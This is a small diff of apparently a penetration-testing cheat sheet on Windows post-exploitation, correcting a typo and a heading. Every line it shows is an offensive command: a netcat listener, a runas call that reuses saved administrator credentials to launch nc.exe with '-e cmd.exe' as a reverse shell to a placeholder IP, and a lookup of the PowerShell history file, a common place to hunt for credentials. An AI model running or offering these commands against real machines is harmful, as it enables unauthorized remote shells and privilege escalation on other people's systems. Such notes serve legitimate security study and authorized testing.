File searching commands¶

 nc -lvnp 1337

-runas /env /noprofile /savecred /user:DESKTOP-T3I4BBK\administrator "c:\temp\nc.exe [IP-ADRESS] 1337 -e cmd.exe"
+runas /env /noprofile /savecred /user:DESKTOP-T3I4BBK\administrator "c:\temp\nc.exe [IP-ADDRESS] 1337 -e cmd.exe"

-- Locate PowerShell History File:
+- Locate the PowerShell history file:

 (Get-PSReadLineOption).HistorySavePath